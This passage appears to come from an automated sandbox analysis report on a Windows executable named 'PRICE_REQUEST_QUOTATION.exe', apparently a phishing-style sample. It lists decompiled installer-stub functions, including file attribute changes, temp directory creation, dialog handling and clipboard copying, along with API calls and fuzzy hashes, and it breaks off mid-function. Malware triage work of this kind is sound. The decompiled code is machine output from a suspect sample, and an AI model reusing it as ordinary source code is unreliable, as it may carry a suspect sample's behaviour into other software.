                                        				_t3 = GetFileAttributesA(_a4); // executed
                                        				if(_t3 != 0xffffffff) {
                                        					return SetFileAttributesA(_a4, _t3 & 0x000000fe);
                                        				}
                                        				return _t3;
                                        			}





                                        APIs
                                        • GetFileAttributesA.KERNELBASE(?,0040568A,?,?,?), ref: 00405883
                                        • SetFileAttributesA.KERNEL32(?,00000000), ref: 00405895
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.273075902.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.273067126.0000000000400000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.273096672.0000000000407000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.273109569.0000000000409000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273162042.000000000042C000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273182890.0000000000434000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273191883.0000000000437000.00000002.00020000.sdmp
                                        Similarity
                                        • API ID: AttributesFile
                                        • String ID:
                                        • API String ID: 3188754299-0
                                        • Opcode ID: 526d85b860984864a1b6eb1eb54cd64df673d9b311570f6054ba349a806b51eb
                                        • Instruction ID: cb5a672fe6ba1e8618a417a0682e77d28f0f111bf9a29bd8adb2d3f05be15d2c
                                        • Opcode Fuzzy Hash: 526d85b860984864a1b6eb1eb54cd64df673d9b311570f6054ba349a806b51eb
                                        • Instruction Fuzzy Hash: FDC04C71C08501ABD6016B34EF0DC5F7B66EB50322B14CB35F469A01F0C7315C66DA2A
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E004053F2(CHAR* _a4) {
                                        				int _t2;
                                        
                                        				_t2 = CreateDirectoryA(_a4, 0); // executed
                                        				if(_t2 == 0) {
                                        					return GetLastError();
                                        				}
                                        				return 0;
                                        			}





                                        APIs
                                        • CreateDirectoryA.KERNELBASE(?,00000000,0040311D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,004032B8), ref: 004053F8
                                        • GetLastError.KERNEL32 ref: 00405406
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.273075902.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.273067126.0000000000400000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.273096672.0000000000407000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.273109569.0000000000409000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273162042.000000000042C000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273182890.0000000000434000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273191883.0000000000437000.00000002.00020000.sdmp
                                        Similarity
                                        • API ID: CreateDirectoryErrorLast
                                        • String ID:
                                        • API String ID: 1375471231-0
                                        • Opcode ID: e7d0addc6a0e2cebebc6ed5ef3cfbde17ba04572b5523194c914a84283870961
                                        • Instruction ID: 813393d6953da14087893f37eb662e151031eda4d181b9a341b076b840c4c01a
                                        • Opcode Fuzzy Hash: e7d0addc6a0e2cebebc6ed5ef3cfbde17ba04572b5523194c914a84283870961
                                        • Instruction Fuzzy Hash: 27C04C30619502DAD7105B31DD08B5B7E50AB50742F219535A506E11E1D6349492D93E
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E004030B0(void* _a4, long _a8) {
                                        				int _t6;
                                        				long _t10;
                                        
                                        				_t10 = _a8;
                                        				_t6 = ReadFile( *0x409014, _a4, _t10,  &_a8, 0); // executed
                                        				if(_t6 == 0 || _a8 != _t10) {
                                        					return 0;
                                        				} else {
                                        					return 1;
                                        				}
                                        			}






                                        APIs
                                        • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,00402EDD,000000FF,00000004,00000000,00000000,00000000), ref: 004030C7
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.273075902.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.273067126.0000000000400000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.273096672.0000000000407000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.273109569.0000000000409000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273162042.000000000042C000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273182890.0000000000434000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273191883.0000000000437000.00000002.00020000.sdmp
                                        Similarity
                                        • API ID: FileRead
                                        • String ID:
                                        • API String ID: 2738559852-0
                                        • Opcode ID: 27fbe12f246225e3c312bde4903856853e362ca19ec2099a42773af8ab92d4e2
                                        • Instruction ID: 90557e19d7482b95f4dd5f96256efcc3496d5940ec1e4df6b8622c0cc682be59
                                        • Opcode Fuzzy Hash: 27fbe12f246225e3c312bde4903856853e362ca19ec2099a42773af8ab92d4e2
                                        • Instruction Fuzzy Hash: A1E08C32201118BBCF205E519D00AA73B9CEB043A2F008032BA18E51A0D630EA11ABA9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E004030E2(long _a4) {
                                        				long _t2;
                                        
                                        				_t2 = SetFilePointer( *0x409014, _a4, 0, 0); // executed
                                        				return _t2;
                                        			}





                                        APIs
                                        • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E1C,000087E4), ref: 004030F0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.273075902.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.273067126.0000000000400000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.273096672.0000000000407000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.273109569.0000000000409000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273162042.000000000042C000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273182890.0000000000434000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273191883.0000000000437000.00000002.00020000.sdmp
                                        Similarity
                                        • API ID: FilePointer
                                        • String ID:
                                        • API String ID: 973152223-0
                                        • Opcode ID: b482a8c56bd79b67497ba547cc3d1d0f84b07fc9ac7ac5f50d4e9ed509354c89
                                        • Instruction ID: aafe5e0ddee8b519ffd98e4e857b28c3b9165386d483fecacc2863ad1570d206
                                        • Opcode Fuzzy Hash: b482a8c56bd79b67497ba547cc3d1d0f84b07fc9ac7ac5f50d4e9ed509354c89
                                        • Instruction Fuzzy Hash: D6B01231544200BFDB214F00DF06F057B21B79C701F208030B340380F082712430EB1E
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E004056E5(CHAR* _a4, intOrPtr _a8) {
                                        				CHAR* _t3;
                                        				char _t4;
                                        
                                        				_t3 = _a4;
                                        				while(1) {
                                        					_t4 =  *_t3;
                                        					if(_t4 == 0) {
                                        						break;
                                        					}
                                        					if(_t4 != _a8) {
                                        						_t3 = CharNextA(_t3); // executed
                                        						continue;
                                        					}
                                        					break;
                                        				}
                                        				return _t3;
                                        			}






                                        APIs
                                        • CharNextA.USER32(?,00403215,"C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe" ,00409168), ref: 004056F2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.273075902.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.273067126.0000000000400000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.273096672.0000000000407000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.273109569.0000000000409000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273162042.000000000042C000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273182890.0000000000434000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273191883.0000000000437000.00000002.00020000.sdmp
                                        Similarity
                                        • API ID: CharNext
                                        • String ID:
                                        • API String ID: 3213498283-0
                                        • Opcode ID: b78f2958c7f68e19d57b7ad513a89c73604121592eb64134f43146a97932e323
                                        • Instruction ID: d90016124225ae7065af0310e7167278304a7e66743f3b900cadaec09162e188
                                        • Opcode Fuzzy Hash: b78f2958c7f68e19d57b7ad513a89c73604121592eb64134f43146a97932e323
                                        • Instruction Fuzzy Hash: D3C08024C0D74567C550471041244677FE4AA61350F944C96F0C863170C5366C409F2A
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Non-executed Functions

                                        C-Code - Quality: 96%
                                        			E00404FF1(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
                                        				struct HWND__* _v8;
                                        				long _v12;
                                        				struct tagRECT _v28;
                                        				void* _v36;
                                        				signed int _v40;
                                        				int _v44;
                                        				int _v48;
                                        				signed int _v52;
                                        				int _v56;
                                        				void* _v60;
                                        				void* _v68;
                                        				void* __ebx;
                                        				void* __edi;
                                        				void* __esi;
                                        				long _t87;
                                        				unsigned int _t92;
                                        				unsigned int _t93;
                                        				int _t94;
                                        				int _t95;
                                        				long _t98;
                                        				void* _t101;
                                        				intOrPtr _t123;
                                        				struct HWND__* _t127;
                                        				int _t149;
                                        				int _t150;
                                        				struct HWND__* _t154;
                                        				struct HWND__* _t158;
                                        				struct HMENU__* _t160;
                                        				long _t162;
                                        				void* _t163;
                                        				short* _t164;
                                        
                                        				_t154 =  *0x42e404; // 0x0
                                        				_t149 = 0;
                                        				_v8 = _t154;
                                        				if(_a8 != 0x110) {
                                        					__eflags = _a8 - 0x405;
                                        					if(_a8 == 0x405) {
                                        						CloseHandle(CreateThread(0, 0, E00404F85, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
                                        					}
                                        					__eflags = _a8 - 0x111;
                                        					if(_a8 != 0x111) {
                                        						L17:
                                        						__eflags = _a8 - 0x404;
                                        						if(_a8 != 0x404) {
                                        							L25:
                                        							__eflags = _a8 - 0x7b;
                                        							if(_a8 != 0x7b) {
                                        								goto L20;
                                        							}
                                        							__eflags = _a12 - _t154;
                                        							if(_a12 != _t154) {
                                        								goto L20;
                                        							}
                                        							_t87 = SendMessageA(_t154, 0x1004, _t149, _t149);
                                        							__eflags = _t87 - _t149;
                                        							_a8 = _t87;
                                        							if(_t87 <= _t149) {
                                        								L37:
                                        								return 0;
                                        							}
                                        							_t160 = CreatePopupMenu();
                                        							AppendMenuA(_t160, _t149, 1, E00405BE9(_t149, _t154, _t160, _t149, 0xffffffe1));
                                        							_t92 = _a16;
                                        							__eflags = _t92 - 0xffffffff;
                                        							if(_t92 != 0xffffffff) {
                                        								_t150 = _t92;
                                        								_t93 = _t92 >> 0x10;
                                        								__eflags = _t93;
                                        								_t94 = _t93;
                                        							} else {
                                        								GetWindowRect(_t154,  &_v28);
                                        								_t150 = _v28.left;
                                        								_t94 = _v28.top;
                                        							}
                                        							_t95 = TrackPopupMenu(_t160, 0x180, _t150, _t94, _t149, _a4, _t149);
                                        							_t162 = 1;
                                        							__eflags = _t95 - 1;
                                        							if(_t95 == 1) {
                                        								_v60 = _t149;
                                        								_v48 = 0x42a0a0;
                                        								_v44 = 0xfff;
                                        								_a4 = _a8;
                                        								do {
                                        									_a4 = _a4 - 1;
                                        									_t98 = SendMessageA(_v8, 0x102d, _a4,  &_v68);
                                        									__eflags = _a4 - _t149;
                                        									_t162 = _t162 + _t98 + 2;
                                        								} while (_a4 != _t149);
                                        								OpenClipboard(_t149);
                                        								EmptyClipboard();
                                        								_t101 = GlobalAlloc(0x42, _t162);
                                        								_a4 = _t101;
                                        								_t163 = GlobalLock(_t101);
                                        								do {
                                        									_v48 = _t163;
                                        									_t164 = _t163 + SendMessageA(_v8, 0x102d, _t149,  &_v68);
                                        									 *_t164 = 0xa0d;
                                        									_t163 = _t164 + 2;
                                        									_t149 = _t149 + 1;
                                        									__eflags = _t149 - _a8;
                                        								} while (_t149 < _a8);
                                        								GlobalUnlock(_a4);
                                        								SetClipboardData(1, _a4);
                                        								CloseClipboard();
                                        							}
                                        							goto L37;
                                        						}
                                        						__eflags =  *0x42e3ec - _t149; // 0x0
                                        						if(__eflags == 0) {
                                        							ShowWindow( *0x42ec28, 8);
                                        							__eflags =  *0x42ecac - _t149; // 0x0
                                        							if(__eflags == 0) {
                                        								E00404EB3( *((intOrPtr*)( *0x429870 + 0x34)), _t149);
                                        							}
                                        							E00403E5C(1);
                                        							goto L25;
                                        						}
                                        						 *0x429468 = 2;
                                        						E00403E5C(0x78);
                                        						goto L20;
                                        					} else {
                                        						__eflags = _a12 - 0x403;
                                        						if(_a12 != 0x403) {
                                        							L20:
                                        							return E00403EEA(_a8, _a12, _a16);
                                        						}
                                        						ShowWindow( *0x42e3f0, _t149);
                                        						ShowWindow(_t154, 8);
                                        						E00403EB8(_t154);
                                        						goto L17;
                                        					}
                                        				}
                                        				_v52 = _v52 | 0xffffffff;
                                        				_v40 = _v40 | 0xffffffff;
                                        				_v60 = 2;
                                        				_v56 = 0;
                                        				_v48 = 0;
                                        				_v44 = 0;
                                        				asm("stosd");
                                        				asm("stosd");
                                        				_t123 =  *0x42ec30; // 0x6c0230
                                        				_a8 =  *((intOrPtr*)(_t123 + 0x5c));
                                        				_a12 =  *((intOrPtr*)(_t123 + 0x60));
                                        				 *0x42e3f0 = GetDlgItem(_a4, 0x403);
                                        				 *0x42e3e8 = GetDlgItem(_a4, 0x3ee);
                                        				_t127 = GetDlgItem(_a4, 0x3f8);
                                        				 *0x42e404 = _t127;
                                        				_v8 = _t127;
                                        				E00403EB8( *0x42e3f0);
                                        				 *0x42e3f4 = E00404755(4);
                                        				 *0x42e40c = 0;
                                        				GetClientRect(_v8,  &_v28);
                                        				_v52 = _v28.right - GetSystemMetrics(0x15);
                                        				SendMessageA(_v8, 0x101b, 0,  &_v60);
                                        				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
                                        				if(_a8 >= 0) {
                                        					SendMessageA(_v8, 0x1001, 0, _a8);
                                        					SendMessageA(_v8, 0x1026, 0, _a8);
                                        				}
                                        				if(_a12 >= _t149) {
                                        					SendMessageA(_v8, 0x1024, _t149, _a12);
                                        				}
                                        				_push( *((intOrPtr*)(_a16 + 0x30)));
                                        				_push(0x1b);
                                        				E00403E83(_a4);
                                        				if(( *0x42ec38 & 0x00000003) != 0) {
                                        					ShowWindow( *0x42e3f0, _t149);
                                        					if(( *0x42ec38 & 0x00000002) != 0) {
                                        						 *0x42e3f0 = _t149;
                                        					} else {
                                        						ShowWindow(_v8, 8);
                                        					}
                                        					E00403EB8( *0x42e3e8);
                                        				}
                                        				_t158 = GetDlgItem(_a4, 0x3ec);
                                        				SendMessageA(_t158, 0x401, _t149, 0x75300000);
                                        				if(( *0x42ec38 & 0x00000004) != 0) {
                                        					SendMessageA(_t158, 0x409, _t149, _a12);
                                        					SendMessageA(_t158, 0x2001, _t149, _a8);
                                        				}
                                        				goto L37;
                                        			}



































                                        APIs
                                        • GetDlgItem.USER32 ref: 00405050
                                        • GetDlgItem.USER32 ref: 0040505F
                                        • GetClientRect.USER32 ref: 0040509C
                                        • GetSystemMetrics.USER32 ref: 004050A4
                                        • SendMessageA.USER32 ref: 004050C5
                                        • SendMessageA.USER32 ref: 004050D6
                                        • SendMessageA.USER32 ref: 004050E9
                                        • SendMessageA.USER32 ref: 004050F7
                                        • SendMessageA.USER32 ref: 0040510A
                                        • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040512C
                                        • ShowWindow.USER32(?,00000008), ref: 00405140
                                        • GetDlgItem.USER32 ref: 00405161
                                        • SendMessageA.USER32 ref: 00405171
                                        • SendMessageA.USER32 ref: 0040518A
                                        • SendMessageA.USER32 ref: 00405196
                                        • GetDlgItem.USER32 ref: 0040506E
                                          • Part of subcall function 00403EB8: SendMessageA.USER32 ref: 00403EC6
                                        • GetDlgItem.USER32 ref: 004051B3
                                        • CreateThread.KERNEL32 ref: 004051C1
                                        • CloseHandle.KERNEL32(00000000), ref: 004051C8
                                        • ShowWindow.USER32(00000000), ref: 004051EC
                                        • ShowWindow.USER32(00000000,00000008), ref: 004051F1
                                        • ShowWindow.USER32(00000008), ref: 00405238
                                        • SendMessageA.USER32 ref: 0040526A
                                        • CreatePopupMenu.USER32 ref: 0040527B
                                        • AppendMenuA.USER32 ref: 00405290
                                        • GetWindowRect.USER32 ref: 004052A3
                                        • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004052C7
                                        • SendMessageA.USER32 ref: 00405302
                                        • OpenClipboard.USER32(00000000), ref: 00405312
                                        • EmptyClipboard.USER32(?,?,00000000,?,00000000), ref: 00405318
                                        • GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 00405321
                                        • GlobalLock.KERNEL32 ref: 0040532B
                                        • SendMessageA.USER32 ref: 0040533F
                                        • GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 00405357
                                        • SetClipboardData.USER32 ref: 00405362
                                        • CloseClipboard.USER32(?,?,00000000,?,00000000), ref: 00405368
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.273075902.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.273067126.0000000000400000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.273096672.0000000000407000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.273109569.0000000000409000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273162042.000000000042C000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273182890.0000000000434000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273191883.0000000000437000.00000002.00020000.sdmp
                                        Similarity
                                        • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                        • String ID: {
                                        • API String ID: 590372296-366298937
                                        • Opcode ID: 5894735c6d9b26e843971f9630d97cc706520b5bf8544c8db5e3cdb289504f93
                                        • Instruction ID: 14fcdc656e1060cfbb0aff817b75222918c1b3830be54c9a3b8aebe23af76a49
                                        • Opcode Fuzzy Hash: 5894735c6d9b26e843971f9630d97cc706520b5bf8544c8db5e3cdb289504f93
                                        • Instruction Fuzzy Hash: 0BA13A71900208FFDB11AFA1DC89AAF7F79FB04355F00817AFA05AA2A0C7755A41DF99
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 98%
                                        			E00404802(struct HWND__* _a4, int _a8, unsigned int _a12, int _a16) {
                                        				struct HWND__* _v8;
                                        				struct HWND__* _v12;
                                        				signed int _v16;
                                        				intOrPtr _v20;
                                        				void* _v24;
                                        				long _v28;
                                        				int _v32;
                                        				signed int _v40;
                                        				int _v44;
                                        				signed int* _v56;
                                        				intOrPtr _v60;
                                        				signed int _v64;
                                        				long _v68;
                                        				void* _v72;
                                        				intOrPtr _v76;
                                        				intOrPtr _v80;
                                        				void* _v84;
                                        				void* __ebx;
                                        				void* __edi;
                                        				void* __esi;
                                        				struct HWND__* _t182;
                                        				intOrPtr _t183;
                                        				int _t189;
                                        				int _t196;
                                        				intOrPtr _t198;
                                        				long _t202;
                                        				signed int _t206;
                                        				signed int _t217;
                                        				void* _t220;
                                        				void* _t221;
                                        				int _t227;
                                        				intOrPtr _t231;
                                        				signed int _t232;
                                        				signed int _t233;
                                        				signed int _t240;
                                        				signed int _t242;
                                        				signed int _t245;
                                        				signed int _t247;
                                        				struct HBITMAP__* _t250;
                                        				void* _t252;
                                        				char* _t268;
                                        				signed char _t269;
                                        				long _t274;
                                        				int _t280;
                                        				signed int* _t281;
                                        				int _t282;
                                        				long _t283;
                                        				signed int* _t284;
                                        				int _t285;
                                        				long _t286;
                                        				signed int _t287;
                                        				long _t288;
                                        				signed int _t291;
                                        				int _t294;
                                        				signed int _t298;
                                        				signed int _t300;
                                        				signed int _t302;
                                        				intOrPtr _t309;
                                        				int* _t310;
                                        				void* _t311;
                                        				int _t315;
                                        				int _t316;
                                        				int _t317;
                                        				signed int _t318;
                                        				void* _t320;
                                        				void* _t328;
                                        				void* _t331;
                                        
                                        				_v12 = GetDlgItem(_a4, 0x3f9);
                                        				_t182 = GetDlgItem(_a4, 0x408);
                                        				_t280 =  *0x42ec48; // 0x6c03dc
                                        				_t320 = SendMessageA;
                                        				_v8 = _t182;
                                        				_t183 =  *0x42ec30; // 0x6c0230
                                        				_t315 = 0;
                                        				_v32 = _t280;
                                        				_v20 = _t183 + 0x94;
                                        				if(_a8 != 0x110) {
                                        					L23:
                                        					__eflags = _a8 - 0x405;
                                        					if(_a8 != 0x405) {
                                        						_t289 = _a16;
                                        					} else {
                                        						_a12 = _t315;
                                        						_t289 = 1;
                                        						_a8 = 0x40f;
                                        						_a16 = 1;
                                        					}
                                        					__eflags = _a8 - 0x4e;
                                        					if(_a8 == 0x4e) {
                                        						L28:
                                        						__eflags = _a8 - 0x413;
                                        						_v16 = _t289;
                                        						if(_a8 == 0x413) {
                                        							L30:
                                        							__eflags =  *0x42ec39 & 0x00000002;
                                        							if(( *0x42ec39 & 0x00000002) != 0) {
                                        								L41:
                                        								__eflags = _v16 - _t315;
                                        								if(_v16 != _t315) {
                                        									_t232 = _v16;
                                        									__eflags =  *((intOrPtr*)(_t232 + 8)) - 0xfffffe6e;
                                        									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe6e) {
                                        										SendMessageA(_v8, 0x419, _t315,  *(_t232 + 0x5c));
                                        									}
                                        									_t233 = _v16;
                                        									__eflags =  *((intOrPtr*)(_t233 + 8)) - 0xfffffe6a;
                                        									if( *((intOrPtr*)(_t233 + 8)) == 0xfffffe6a) {
                                        										__eflags =  *((intOrPtr*)(_t233 + 0xc)) - 2;
                                        										if( *((intOrPtr*)(_t233 + 0xc)) != 2) {
                                        											_t284 =  *(_t233 + 0x5c) * 0x418 + _t280 + 8;
                                        											 *_t284 =  *_t284 & 0xffffffdf;
                                        											__eflags =  *_t284;
                                        										} else {
                                        											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) | 0x00000020;
                                        										}
                                        									}
                                        								}
                                        								goto L48;
                                        							}
                                        							__eflags = _a8 - 0x413;
                                        							if(_a8 == 0x413) {
                                        								L33:
                                        								__eflags = _a8 - 0x413;
                                        								_t289 = 0 | _a8 != 0x00000413;
                                        								_t240 = E00404782(_v8, _a8 != 0x413);
                                        								__eflags = _t240 - _t315;
                                        								if(_t240 >= _t315) {
                                        									_t93 = _t280 + 8; // 0x8
                                        									_t310 = _t240 * 0x418 + _t93;
                                        									_t289 =  *_t310;
                                        									__eflags = _t289 & 0x00000010;
                                        									if((_t289 & 0x00000010) == 0) {
                                        										__eflags = _t289 & 0x00000040;
                                        										if((_t289 & 0x00000040) == 0) {
                                        											_t298 = _t289 ^ 0x00000001;
                                        											__eflags = _t298;
                                        										} else {
                                        											_t300 = _t289 ^ 0x00000080;
                                        											__eflags = _t300;
                                        											if(_t300 >= 0) {
                                        												_t298 = _t300 & 0xfffffffe;
                                        											} else {
                                        												_t298 = _t300 | 0x00000001;
                                        											}
                                        										}
                                        										 *_t310 = _t298;
                                        										E0040117D(_t240);
                                        										_t242 =  *0x42ec38; // 0x80
                                        										_t289 = 1;
                                        										_a8 = 0x40f;
                                        										_t245 =  !_t242 >> 0x00000008 & 1;
                                        										__eflags = _t245;
                                        										_a12 = 1;
                                        										_a16 = _t245;
                                        									}
                                        								}
                                        								goto L41;
                                        							}
                                        							_t289 = _a16;
                                        							__eflags =  *((intOrPtr*)(_t289 + 8)) - 0xfffffffe;
                                        							if( *((intOrPtr*)(_t289 + 8)) != 0xfffffffe) {
                                        								goto L41;
                                        							}
                                        							goto L33;
                                        						}
                                        						__eflags =  *((intOrPtr*)(_t289 + 4)) - 0x408;
                                        						if( *((intOrPtr*)(_t289 + 4)) != 0x408) {
                                        							goto L48;
                                        						}
                                        						goto L30;
                                        					} else {
                                        						__eflags = _a8 - 0x413;
                                        						if(_a8 != 0x413) {
                                        							L48:
                                        							__eflags = _a8 - 0x111;
                                        							if(_a8 != 0x111) {
                                        								L56:
                                        								__eflags = _a8 - 0x200;
                                        								if(_a8 == 0x200) {
                                        									SendMessageA(_v8, 0x200, _t315, _t315);
                                        								}
                                        								__eflags = _a8 - 0x40b;
                                        								if(_a8 == 0x40b) {
                                        									_t220 =  *0x42a07c;
                                        									__eflags = _t220 - _t315;
                                        									if(_t220 != _t315) {
                                        										ImageList_Destroy(_t220);
                                        									}
                                        									_t221 =  *0x42a094;
                                        									__eflags = _t221 - _t315;
                                        									if(_t221 != _t315) {
                                        										GlobalFree(_t221);
                                        									}
                                        									 *0x42a07c = _t315;
                                        									 *0x42a094 = _t315;
                                        									 *0x42ec80 = _t315;
                                        								}
                                        								__eflags = _a8 - 0x40f;
                                        								if(_a8 != 0x40f) {
                                        									L86:
                                        									__eflags = _a8 - 0x420;
                                        									if(_a8 == 0x420) {
                                        										__eflags =  *0x42ec39 & 0x00000001;
                                        										if(( *0x42ec39 & 0x00000001) != 0) {
                                        											__eflags = _a16 - 0x20;
                                        											_t189 = (0 | _a16 == 0x00000020) << 3;
                                        											__eflags = _t189;
                                        											_t316 = _t189;
                                        											ShowWindow(_v8, _t316);
                                        											ShowWindow(GetDlgItem(_a4, 0x3fe), _t316);
                                        										}
                                        									}
                                        									goto L89;
                                        								} else {
                                        									E004011EF(_t289, _t315, _t315);
                                        									__eflags = _a12 - _t315;
                                        									if(_a12 != _t315) {
                                        										E0040140B(8);
                                        									}
                                        									__eflags = _a16 - _t315;
                                        									if(_a16 == _t315) {
                                        										L73:
                                        										E004011EF(_t289, _t315, _t315);
                                        										__eflags =  *0x42ec4c - _t315; // 0x4
                                        										_v32 =  *0x42a094;
                                        										_t196 =  *0x42ec48; // 0x6c03dc
                                        										_v60 = 0xf030;
                                        										_v16 = _t315;
                                        										if(__eflags <= 0) {
                                        											L84:
                                        											InvalidateRect(_v8, _t315, 1);
                                        											_t198 =  *0x42e3fc; // 0x6c6eb3
                                        											__eflags =  *((intOrPtr*)(_t198 + 0x10)) - _t315;
                                        											if( *((intOrPtr*)(_t198 + 0x10)) != _t315) {
                                        												E0040473D(0x3ff, 0xfffffffb, E00404755(5));
                                        											}
                                        											goto L86;
                                        										} else {
                                        											_t142 = _t196 + 8; // 0x6c03e4
                                        											_t281 = _t142;
                                        											do {
                                        												_t202 =  *((intOrPtr*)(_v32 + _v16 * 4));
                                        												__eflags = _t202 - _t315;
                                        												if(_t202 != _t315) {
                                        													_t291 =  *_t281;
                                        													_v68 = _t202;
                                        													__eflags = _t291 & 0x00000001;
                                        													_v72 = 8;
                                        													if((_t291 & 0x00000001) != 0) {
                                        														_t151 =  &(_t281[4]); // 0x6c03f4
                                        														_v72 = 9;
                                        														_v56 = _t151;
                                        														_t154 =  &(_t281[0]);
                                        														 *_t154 = _t281[0] & 0x000000fe;
                                        														__eflags =  *_t154;
                                        													}
                                        													__eflags = _t291 & 0x00000040;
                                        													if((_t291 & 0x00000040) == 0) {
                                        														_t206 = (_t291 & 0x00000001) + 1;
                                        														__eflags = _t291 & 0x00000010;
                                        														if((_t291 & 0x00000010) != 0) {
                                        															_t206 = _t206 + 3;
                                        															__eflags = _t206;
                                        														}
                                        													} else {
                                        														_t206 = 3;
                                        													}
                                        													_t294 = (_t291 >> 0x00000005 & 0x00000001) + 1;
                                        													__eflags = _t294;
                                        													_v64 = (_t206 << 0x0000000b | _t291 & 0x00000008) + (_t206 << 0x0000000b | _t291 & 0x00000008) | _t291 & 0x00000020;
                                        													SendMessageA(_v8, 0x1102, _t294, _v68);
                                        													SendMessageA(_v8, 0x110d, _t315,  &_v72);
                                        												}
                                        												_v16 = _v16 + 1;
                                        												_t281 =  &(_t281[0x106]);
                                        												__eflags = _v16 -  *0x42ec4c; // 0x4
                                        											} while (__eflags < 0);
                                        											goto L84;
                                        										}
                                        									} else {
                                        										_t282 = E004012E2( *0x42a094);
                                        										E00401299(_t282);
                                        										_t217 = 0;
                                        										_t289 = 0;
                                        										__eflags = _t282 - _t315;
                                        										if(_t282 <= _t315) {
                                        											L72:
                                        											SendMessageA(_v12, 0x14e, _t289, _t315);
                                        											_a16 = _t282;
                                        											_a8 = 0x420;
                                        											goto L73;
                                        										} else {
                                        											goto L69;
                                        										}
                                        										do {
                                        											L69:
                                        											_t309 = _v20;
                                        											__eflags =  *((intOrPtr*)(_t309 + _t217 * 4)) - _t315;
                                        											if( *((intOrPtr*)(_t309 + _t217 * 4)) != _t315) {
                                        												_t289 = _t289 + 1;
                                        												__eflags = _t289;
                                        											}
                                        											_t217 = _t217 + 1;
                                        											__eflags = _t217 - _t282;
                                        										} while (_t217 < _t282);
                                        										goto L72;
                                        									}
                                        								}
                                        							}
                                        							__eflags = _a12 - 0x3f9;
                                        							if(_a12 != 0x3f9) {
                                        								goto L89;
                                        							}
                                        							__eflags = _a12 >> 0x10 - 1;
                                        							if(_a12 >> 0x10 != 1) {
                                        								goto L89;
                                        							}
                                        							_t227 = SendMessageA(_v12, 0x147, _t315, _t315);
                                        							__eflags = _t227 - 0xffffffff;
                                        							if(_t227 == 0xffffffff) {
                                        								goto L89;
                                        							}
                                        							_t283 = SendMessageA(_v12, 0x150, _t227, _t315);
                                        							__eflags = _t283 - 0xffffffff;
                                        							if(_t283 == 0xffffffff) {
                                        								L54:
                                        								_t283 = 0x20;
                                        								L55:
                                        								E00401299(_t283);
                                        								SendMessageA(_a4, 0x420, _t315, _t283);
                                        								_a12 = 1;
                                        								_a16 = _t315;
                                        								_a8 = 0x40f;
                                        								goto L56;
